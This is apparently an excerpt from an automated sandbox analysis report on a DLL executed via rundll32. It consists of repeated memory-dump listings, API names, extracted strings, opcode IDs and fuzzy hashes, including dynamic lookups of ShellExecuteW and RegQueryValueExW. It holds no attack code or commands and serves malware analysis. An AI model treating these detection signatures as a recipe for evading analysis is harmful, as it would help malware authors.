                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 3809448442-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 2666907392-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 84dfab6d8172c11f77b414dd97d6e914d8b7a96cc48963b32e03c45dc50c657e
                                                                                                                                  • Instruction ID: 2c6c7a7b1d17f320c1792f218ce074bad44cb980c5a52b758e2d6f8c93f6019b
                                                                                                                                  • Opcode Fuzzy Hash: 84dfab6d8172c11f77b414dd97d6e914d8b7a96cc48963b32e03c45dc50c657e
                                                                                                                                  • Instruction Fuzzy Hash: 7D316F72604A8881EA97DB15E8503D97761F798BE0F68C322FA5D176E5DF38C68DC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 620047600-3145022300
                                                                                                                                  • Opcode ID: 576065deb2ea874c3d036d3935cf1e4fa8ca15b2c119d416514965b14070bf2d
                                                                                                                                  • Instruction ID: afb1d25f7f6a659e3ccf1534ae0290ba0e63db629d8d0aed09161fb4d3141880
                                                                                                                                  • Opcode Fuzzy Hash: 576065deb2ea874c3d036d3935cf1e4fa8ca15b2c119d416514965b14070bf2d
                                                                                                                                  • Instruction Fuzzy Hash: FC315272604B4881EAA6DB15E8403E97760F75CBE0F548222FA5D037E5DF39C68DD700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast$ios_base::badbit set
                                                                                                                                  • API String ID: 1776536810-182444483
                                                                                                                                  • Opcode ID: 8350d050f5a0f01878a3f2d3d7fa6fc40c68057f815e104cabb17d988fe9a483
                                                                                                                                  • Instruction ID: 02ad155c9015395c238964cca4a8f2f47d031e4f92e59427d6e1992964da67f8
                                                                                                                                  • Opcode Fuzzy Hash: 8350d050f5a0f01878a3f2d3d7fa6fc40c68057f815e104cabb17d988fe9a483
                                                                                                                                  • Instruction Fuzzy Hash: 3D314C32600A4881EA97DB15E5403D97361E798BE0F589222FA6E577F9DE38C68AC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterCurrentFrequencyThread
                                                                                                                                  • String ID: %s - %s$QueryPerformanceFrequency failed!$tictoc::elapsed${%x - Thread} [time-taken:%lf mecs]
                                                                                                                                  • API String ID: 2794441565-1894815428
                                                                                                                                  • Opcode ID: ba7330a78a44e98a6fe4daf9ad7e95193e872844c99b5209028e9c264dfbe5dd
                                                                                                                                  • Instruction ID: 1bba317a9f79f487bdb650a74916e14e33f5e1548796781d805f1c8c0c14da27
                                                                                                                                  • Opcode Fuzzy Hash: ba7330a78a44e98a6fe4daf9ad7e95193e872844c99b5209028e9c264dfbe5dd
                                                                                                                                  • Instruction Fuzzy Hash: B2417C32708B8A82E731DB64E4603EBB369FB94795F404236E68D53A98DF7DD245CB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: %s: GetMajorType failed for video stream, error - %x$ConfigureSourceReaderVideo$GetGUID MF_MT_SUBTYPE hr=0x%08X le=%d$GetNativeMediaType hr=0x%08X le=%d$SetGUID MF_MT_SUBTYPE (%d) hr=0x%08X le=%d
                                                                                                                                  • API String ID: 1452528299-3155781339
                                                                                                                                  • Opcode ID: efa0075014274d6ca57fcb6332186627843c869df92de8aa5742aa0c05e12b95
                                                                                                                                  • Instruction ID: 9c408c773b8f4e64473c378a0fc928bd26c35b0b3a873174518343bde3452288
                                                                                                                                  • Opcode Fuzzy Hash: efa0075014274d6ca57fcb6332186627843c869df92de8aa5742aa0c05e12b95
                                                                                                                                  • Instruction Fuzzy Hash: 73914C26B09B1685FB308FEBE8A03AC3364BB48B85F014136DE5D67B64DE79E9059340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: GetGUID MF_MT_SUBTYPE hr=0x%08X le=%d$GetNativeMediaType Stream %d hr=0x%08X le=%d$SetCurrentMediaType MF_SOURCE_READER_FIRST_AUDIO_STREAM hr=0x%08X le=%d$SetGUID MF_MT_SUBTYPE (%d) hr=0x%08X le=%d
                                                                                                                                  • API String ID: 1452528299-3119712302
                                                                                                                                  • Opcode ID: e29568572fa14d84d16d7519d0c820b574227a19fb104b39875f44c73128b5f3
                                                                                                                                  • Instruction ID: 9d04cccea16fdde4d86f82fb75639d54d2ed886370e325f379287f516879d1a3
                                                                                                                                  • Opcode Fuzzy Hash: e29568572fa14d84d16d7519d0c820b574227a19fb104b39875f44c73128b5f3
                                                                                                                                  • Instruction Fuzzy Hash: EE71513671AB4682EB308F97E8A46696364FB88F85F115035DE4E53B64DE7DE401D700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                  • Opcode ID: 3fbd0b3e35addabc098f64ab091990d7b6a2871f8ac9e4cce4e35d3e8861d74a
                                                                                                                                  • Instruction ID: fc16e1660138297f9bb3e8678e6c16cd315b57137c63fc5872edf9e7c8194a9d
                                                                                                                                  • Opcode Fuzzy Hash: 3fbd0b3e35addabc098f64ab091990d7b6a2871f8ac9e4cce4e35d3e8861d74a
                                                                                                                                  • Instruction Fuzzy Hash: 30619F32301B4892EBA3DB16E94139A73A0F78CBD8F058125AF4D47B51DF78C66AC740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 736098846-0
                                                                                                                                  • Opcode ID: efc3fe0037e42635d1aa8fecd1ef55e2eadabcfa4abc9b3b191b5c73e548401a
                                                                                                                                  • Instruction ID: a71ed13292dcd256f6dc4ddd4aebe79e4aabeb9c173e3c801e3f12126509f7fc
                                                                                                                                  • Opcode Fuzzy Hash: efc3fe0037e42635d1aa8fecd1ef55e2eadabcfa4abc9b3b191b5c73e548401a
                                                                                                                                  • Instruction Fuzzy Hash: 66410935B16B8191FB649FA2E5A01B83368FF85F95B084239DE8E07B59CF799051D320
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                  • Opcode ID: 7b47a042eea3f3de49294c888d2e7f7195dfd9dc128bccc2e4caf73cebc8c57f
                                                                                                                                  • Instruction ID: f2ef72c2d081a62da6ba206108f7190fcdc76fe894ca0d405d2fc84784ff5a10
                                                                                                                                  • Opcode Fuzzy Hash: 7b47a042eea3f3de49294c888d2e7f7195dfd9dc128bccc2e4caf73cebc8c57f
                                                                                                                                  • Instruction Fuzzy Hash: 50411677A01A9D81EBE69B1191C03F972A0F7487DDF9AC116FA845B6C4DF38C7498308
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect
                                                                                                                                  • String ID: Dest rect: {%d, %d, %d, %d}$PAR: %d x %d
                                                                                                                                  • API String ID: 400858303-602302452
                                                                                                                                  • Opcode ID: 559950210395ed975e79b44adc41054cec849b7582ad1d56a255cdf0ad68c0ce
                                                                                                                                  • Instruction ID: 6d5c6035828d8461c356153c8f9c0668ebe94a6db135dfb87690463cb46c969b
                                                                                                                                  • Opcode Fuzzy Hash: 559950210395ed975e79b44adc41054cec849b7582ad1d56a255cdf0ad68c0ce
                                                                                                                                  • Instruction Fuzzy Hash: 5A41AD36718B9583E7209FA6E45015977A8F788FC0F005136DE4E67B24CF79E854CB80
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDirectorySystem$AddressFreeLibraryLoadProc
                                                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll
                                                                                                                                  • API String ID: 1341906590-1831903832
                                                                                                                                  • Opcode ID: 9bc15085328f5bfa94c6fc05054273b19d9ba2339b94c399c8978e9a2a124876
                                                                                                                                  • Instruction ID: 7c32d87cf184fc5449560a552b238016c90c3fc945eb4b0cf7d3d49f8a216d87
                                                                                                                                  • Opcode Fuzzy Hash: 9bc15085328f5bfa94c6fc05054273b19d9ba2339b94c399c8978e9a2a124876
                                                                                                                                  • Instruction Fuzzy Hash: 2A41E625B19B9281FA70EF91B87437963A4BF44BD1F848239DD1D5BB84EE7DE0068300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AddressAllocConditionErrorFreeInfoLastMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$RegQueryValueExW
                                                                                                                                  • API String ID: 3707099831-295176829
                                                                                                                                  • Opcode ID: 698e8803dc34555242da3cc59fb36ac2bbed8fae0d3c80f23629390359c3b53d
                                                                                                                                  • Instruction ID: 46856e45d3b65447ebd70dbeebec4703ade6200835a48e69cf01738710afdc39
                                                                                                                                  • Opcode Fuzzy Hash: 698e8803dc34555242da3cc59fb36ac2bbed8fae0d3c80f23629390359c3b53d
                                                                                                                                  • Instruction Fuzzy Hash: EE317172B09B4286FB70CF91A8A022973E8FB85B81F550539DE4D9BB54DF7DE4109700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: a9291c87b619f3b996d60f5c6d623e361a3f3665819b2df7064c52e3dbe42ad7
                                                                                                                                  • Instruction ID: 91e638e8e58f5590816a3cc392cfc10599bec749f4e2be6b6ca140d2a25e3853
                                                                                                                                  • Opcode Fuzzy Hash: a9291c87b619f3b996d60f5c6d623e361a3f3665819b2df7064c52e3dbe42ad7
                                                                                                                                  • Instruction Fuzzy Hash: 8C314172604A4981EA97DB15E4903D97760F79CBE0F548322BA6D0B7E9DE38C6CDC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 12eb798131b44ed89ccc95a849e9259a6caec3e02f1d91c0b99d509edef29d89
                                                                                                                                  • Instruction ID: 90848ef588fa6780bc4661c9358ff58c986763a4f68afd91812fa81bb0acabc5
                                                                                                                                  • Opcode Fuzzy Hash: 12eb798131b44ed89ccc95a849e9259a6caec3e02f1d91c0b99d509edef29d89
                                                                                                                                  • Instruction Fuzzy Hash: 23315232604A4881EA97DB26E4403D967A1F798BE0F549322FA5D576E5DF38CA8DC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 695fa22a1d6d23245e75d15cd8436973dff841ec1e986202785ff3774109f988
                                                                                                                                  • Instruction ID: 09fe364ddf780e93d9049d4f58e0a1b9e30b89f7d2aa5cb162c798bc91164caf
                                                                                                                                  • Opcode Fuzzy Hash: 695fa22a1d6d23245e75d15cd8436973dff841ec1e986202785ff3774109f988
                                                                                                                                  • Instruction Fuzzy Hash: 69317032604A4D81FAA3DB15E4417E97361F7987E0F148222BA5D07BE9DF38CA8AC700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 2c248766304681b0c2bab5ac96b723214e976363793dd3940de8d17814ddb4c4
                                                                                                                                  • Instruction ID: d5f3d85ad48d5269fabfe6c01bbad63a5faf147fba86dc7cd225a5bba448d346
                                                                                                                                  • Opcode Fuzzy Hash: 2c248766304681b0c2bab5ac96b723214e976363793dd3940de8d17814ddb4c4
                                                                                                                                  • Instruction Fuzzy Hash: 16315071700A4881FA97DB15E4403D97761F7A8BE0F58C321FA5D036E6DE38C68AC740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocal$Free$AddressAllocLibraryLoadProc
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteW
                                                                                                                                  • API String ID: 3119643837-1473611414
                                                                                                                                  • Opcode ID: f4849fe2f0c7abd62b89033c976954a72196e0344b8972263a8a602321c030f5
                                                                                                                                  • Instruction ID: b7420bb9280e5b48deec20829274d0d8af55381c907cead4725564f57b8e5e77
                                                                                                                                  • Opcode Fuzzy Hash: f4849fe2f0c7abd62b89033c976954a72196e0344b8972263a8a602321c030f5
                                                                                                                                  • Instruction Fuzzy Hash: E621D666B1CB8285FA70DF96B87017AA3A4BF48BE5F080438DE4D53B64EE7CE0519700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  • Opcode ID: a68a3c255015a623e0952fdafce5552ec4697e039a4adfb181130a635e184be4
                                                                                                                                  • Instruction ID: b3155ec887754ec426d41302e82ca1272bd2955ff3b21f2f7d625a5ccb09a45c
                                                                                                                                  • Opcode Fuzzy Hash: a68a3c255015a623e0952fdafce5552ec4697e039a4adfb181130a635e184be4
                                                                                                                                  • Instruction Fuzzy Hash: 51213071A11F59D8FB96DB64E8817EC3375B718388F908126F94922AA9EF35C74EC340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                  • API String ID: 4139908857-2387153273
                                                                                                                                  • Opcode ID: 13d3deadd11c91aaa1b09a78a1db330eb72840e8f80f03264e7b8b5f1608b1d5
                                                                                                                                  • Instruction ID: 1fec302fdd5e2a686b2a2e57b6cf79fa560a1201aadf982231699867359ade1e
                                                                                                                                  • Opcode Fuzzy Hash: 13d3deadd11c91aaa1b09a78a1db330eb72840e8f80f03264e7b8b5f1608b1d5
                                                                                                                                  • Instruction Fuzzy Hash: 4711FA64F19B4280FA34EFD1B8B83B022D8AF04346F481635D80D963A1EFBCA694D350
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1855319098-0
                                                                                                                                  • Opcode ID: 2f9469f7e86d9ed662453ed7390a40d8cb98c28b94d45fdd9a0046f49d435607
                                                                                                                                  • Instruction ID: b48272a0fe48caf80c68cbfff6fe37b1983f1ac57bfd09bfec3c9c3905106cea
                                                                                                                                  • Opcode Fuzzy Hash: 2f9469f7e86d9ed662453ed7390a40d8cb98c28b94d45fdd9a0046f49d435607
                                                                                                                                  • Instruction Fuzzy Hash: 85010831202A9888EF9FDF65D5917EC73A4EF59FC8F188116BA4906A86CE64CD94C740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd
                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EmptyRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2270935405-0
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
